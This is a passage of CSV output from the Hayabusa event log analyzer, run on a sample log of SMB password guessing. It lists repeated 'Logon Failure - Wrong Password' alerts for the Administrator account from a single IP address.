NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:08.628 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: v1u5uD9SiDFq9VOD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:08.675 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pZv9l3b7U8tIVmw8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:08.716 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7EfPqiBhm6hRX700 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:08.763 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3uvqgri2KGIDAlg1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:08.816 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: oLXZMXKsjOaurgZV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:08.860 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nXtiRWHDJqpq69Ej | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:08.915 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OeC1T9YkT1hXMcGG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:08.965 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YPf6nlwAeuu7cf00 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:09.008 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4fvVUozD2RuIchN4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:09.052 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KP3rghcrgas3l3q1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:09.084 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MMtcQYoVoM57gTcj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:09.137 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IFjTWECEep09Abjt | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:09.177 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jUlguy8tKBo4DSUR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:09.212 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GETwMERLpiVtMRkw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:09.248 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Bhas9Vjc193EVcOg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:09.288 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OmVAnxq39t7qbcEs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:09.332 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 13y2nnltjipwZqth | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:09.369 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wDQrPBL1VodIcQLR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:09.417 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: K0Mp4jXeHd3b0CLw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:09.472 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3j89GmIDnG4v7JJC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:09.512 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xyRLZMoaXJUrPPfn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:09.607 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZcoyOKUjEi1uCSpD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:09.648 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jWQGVJLcVwgf4YJ8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:09.688 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mrFqG85mmjTYJ4A9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:09.728 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6DqIh1QHTk470nrU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:09.774 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: feVbA94p6iT2pBeC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:09.804 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: T30YHcE8ZG7FaxW7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:09.847 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RaKHRwYtx2lGtOCG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:09.884 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zDEDuMmlDZZfdkFD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:09.935 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CObqGJQi1hOOI83J | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:10.002 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EhsE9bQeEwW21bAj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:10.050 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: El1qxgjvGS0QSS4Y | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:10.097 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vtlr3HwzJcAfSxuO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:10.141 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KDayr44iXmE63vqd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:10.195 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FkNoLVOhnS8ayujK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:10.252 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3ggg78jjziKqijrT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:10.313 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BodeSVqeqa5qBQDL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:10.362 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yY7yxEcuGwWSJZV2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:10.406 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: oTlg6cvsz6Z6QpCp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:10.460 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: V3pTALzqu4Ok6CUR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:10.509 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kdGagQIEcvQQMp4n | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:10.557 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fVu4reOyQEIkChHO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:10.609 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EJWNS69MmMGLSnHc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:10.656 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nPaR2sBxPPCjxpL0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:10.706 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kJJ9A1EfqM4V2TRv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:10.760 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4dxf59xjpxO3oG17 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:10.804 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: o6dMI12g4tjSF8PX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:10.841 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZAqN0xPaW4jg2Kjc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:10.884 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mcnReyIEaqsQfowV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:10.928 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: akOH8Y7XdjOpqTez | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:10.967 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: b0HOK1TIqloud7gh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:10.996 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: n6uIAK55BmTnA6Bf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:11.042 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZDnn6QmLOJ6KwzKt | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:11.084 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: np8KaRJvRqBrGyFL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:11.128 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dxbu69Amr6gWN5Hw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:11.164 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LoZdaFJWNON8Ujnc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:11.212 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: q4RSlXgOS7sssCqU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:11.252 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: j2PJprE7olK4pjrx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:11.297 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jQOAUcWQL32y2gGe | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:11.361 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nXI0wWwzhHN0uvOP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:11.414 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ujGqTzfOhmKgoAjt | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:11.468 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: cFoPtWZ03O3ZZgOC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:11.520 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EyO2VTnpGZLeSIvr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:11.560 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ua69MEWABQ9hsooT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:11.608 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ubPQWn4nQYr3rXr8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:11.650 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xrgATdNqkA44nKqf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:11.688 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qKwktiUfTWakNx3I | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:11.728 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xVebPFnWhbZKIANs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:11.776 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IyV8stIvfXLJQpsn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:11.813 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: uStfvm0y0eZrWONH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:11.920 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OUwTyUXe8NLG7bCS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:11.967 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HQuDp8aZpWDANKMe | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:12.004 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GQKTlzx2gq9ayAtJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:12.061 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tCzVponBvb9mbyIr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:12.115 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mSwnrFv90KjN2cqj | IP Addr: 192.168.198.149 | AuthPackage: 